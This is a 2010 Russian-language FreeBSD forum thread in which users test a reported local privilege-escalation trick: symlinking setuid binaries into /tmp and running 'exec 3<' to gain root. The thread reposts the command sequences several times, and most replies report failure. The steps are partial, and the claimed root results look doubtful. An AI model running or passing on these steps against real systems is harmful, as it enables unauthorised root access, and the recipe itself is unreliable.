Обсуждение всяких разных новостей.
-
r00t
- проходил мимо
Непрочитанное сообщение
r00t » 2010-10-19 19:44:23
Код: Выделить всё
[20:35 alex@darkstar /home/alex]% mkdir /tmp/exploit
[20:35 alex@darkstar /home/alex]% ln -s /sbin/mount_msdosfs /tmp/exploit/target
[20:36 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[20:36 root@darkstar /home/alex]# whoami
root
[20:37 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[20:37 root@darkstar /home/alex]# uname -a
FreeBSD darkstar.velko2000.local 8.0-RC2 FreeBSD 8.0-RC2 #0: Tue Jan 26 11:45:15 MSK 2010 alex@darkstar.domain.local:/usr/obj/usr/src/sys/NG_PF_KERNEL i386
Вот это реальная
жопа на самом деле. Первый достойный и простой локальный эксплоит за многие годы.
Источник:
http://seclists.org/fulldisclosure/2010/Oct/257
r00t
-
Хостинг HostFood.ru
-
Хостинг HostFood.ru
Тарифы на хостинг в России, от 12 рублей:
https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.:
https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах:
https://www.host-food.ru/domains/
-
Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
-
Контактная информация:
Непрочитанное сообщение
Alex Keda » 2010-10-19 19:50:03
Код: Выделить всё
srv1$ sh -E
$ exec 3< /tmp/exploit/target
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$
$ rm -rf /tmp/exploit
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$ mkdir /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ whoami
lissyara
$ uname -a
FreeBSD srv1.host-food.ru 8.1-RC2 FreeBSD 8.1-RC2 #0: Fri Jul 16 13:44:36 MSD 2010 lissyara@srv1.host-food.ru:/home/usr_moved/obj/home/usr_moved/src/sys/HOST-FOOD i386
$
в tcsh выкидывает из ssh на
Убей их всех! Бог потом рассортирует...
Alex Keda
-
Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
-
Контактная информация:
Непрочитанное сообщение
Alex Keda » 2010-10-19 19:59:09
Код: Выделить всё
srv1$ bash
[lissyara@srv1 ~]$ exec 3 < /tmp/exploit/target
bash: exec: 3: не найден
[lissyara@srv1 ~]$ exit
srv1$
Убей их всех! Бог потом рассортирует...
Alex Keda
-
Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
-
Контактная информация:
Непрочитанное сообщение
Alex Keda » 2010-10-19 20:04:28
это не та ли бага с ld.so которую летом ли весной фиксили?
Убей их всех! Бог потом рассортирует...
Alex Keda
-
r00t
- проходил мимо
Непрочитанное сообщение
r00t » 2010-10-19 20:06:11
Код: Выделить всё
[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[/code]
r00t
-
r00t
- проходил мимо
Непрочитанное сообщение
r00t » 2010-10-19 20:08:02
Код: Выделить всё
[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[/code]
Нет, это что-то новое. в csh попробуй ))
r00t
-
hizel
- дядя поня
- Сообщения: 9032
- Зарегистрирован: 2007-06-29 10:05:02
- Откуда: Выборг
Непрочитанное сообщение
hizel » 2010-10-19 20:46:20
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.
hizel
-
FreeBSP
- майор
- Сообщения: 2020
- Зарегистрирован: 2009-05-24 20:20:19
- Откуда: Москва
Непрочитанное сообщение
FreeBSP » 2010-10-19 22:58:39
Код: Выделить всё
[@~]$ mkdir -p /tmp/exploit
[@~]$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
[@~]$ exec 3< /tmp/exploit/target
[@~]$ id -u
1001
[@~]$ uname -mrs
7.2-RELEASE-p8 i386
[@~]$ rm -rf /tmp/exploit
[@~]$
тенех вылетает на exec. может оно ломается, но ломается неправильно?
Человек начинает получать первые наслаждения от знакомства с unix системами. Ему нужно помочь - дальше он сможет получать наслаждение самостоятельно ©
Ламер — не желающий самостоятельно разбираться. Не путать с новичком: ламер опасен и знает это!
FreeBSP
-
Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
-
Контактная информация:
Непрочитанное сообщение
Alex Keda » 2010-10-19 23:04:00
фиксили в ld.so именно такой момент.
и именно выход был сделан на попытку повысить привелегии
искать лень. тут же где-то тема
Убей их всех! Бог потом рассортирует...
Alex Keda
-
schizoid
- подполковник
- Сообщения: 3228
- Зарегистрирован: 2007-03-03 17:32:31
- Откуда: Украина, Чернигов
-
Контактная информация:
Непрочитанное сообщение
schizoid » 2010-10-20 9:41:16
шота у меня не работает... Фря 7.1-RELEASE-p11 и 6.3-RELEASE-p13
ядерный взрыв...смертельно красиво...жаль, что не вечно...
schizoid
-
terminus
- майор
- Сообщения: 2305
- Зарегистрирован: 2007-10-29 11:27:35
- Откуда: Рига
Непрочитанное сообщение
terminus » 2010-10-20 9:46:52
Так это же линуксовая фигня! Читайте опеннет - там бурление говен среди линуксойдов и требования отставки столмана в связи с утратой доверия к libc.
Да и вон у топикстартера хостнейм darkstar - слекварщиг вестимо...
Модель: AST-PM-105/0044; Тип: Универсальный, ремонтный; Название: Терминус; Род повреждения: Распад функций; Выводы: Сдать на слом.
terminus
-
Гость
- проходил мимо
Непрочитанное сообщение
Гость » 2010-10-20 9:59:29
Код: Выделить всё
$ mkdir -p /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ id -u
1001
$ uname -psr
FreeBSD 6.4-RELEASE-p6 i386
$ whereis bash
bash: /usr/ports/shells/bash
$ csh
% exec 3< /tmp/exploit/target
3: Command not found.
После этого вылетел из SSH-сессии. Захожу заново, шелл по умолчанию - csh
Код: Выделить всё
% exec 3< /tmp/exploit/target
3: Command not found.
# id -u
0
Гость
-
hedgehog
- сержант
- Сообщения: 220
- Зарегистрирован: 2010-01-26 11:47:05
- Откуда: Kharkiv, Ukraine
-
Контактная информация:
Непрочитанное сообщение
hedgehog » 2010-10-20 10:05:47
freebsd 8.1 amd64, zfs. пробую на виртуалке - не выходит. после exec просто вываливаюсь из текущего шелла. пробовал включать setuid для /tmp. обновись, а?
кстати, судя по опеннету надо создавать хардлинк, монтировать /proc и еще чего-то крутить.
Код: Выделить всё
$ ln /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: Cross-device link
привет монтирующим только / ?
hedgehog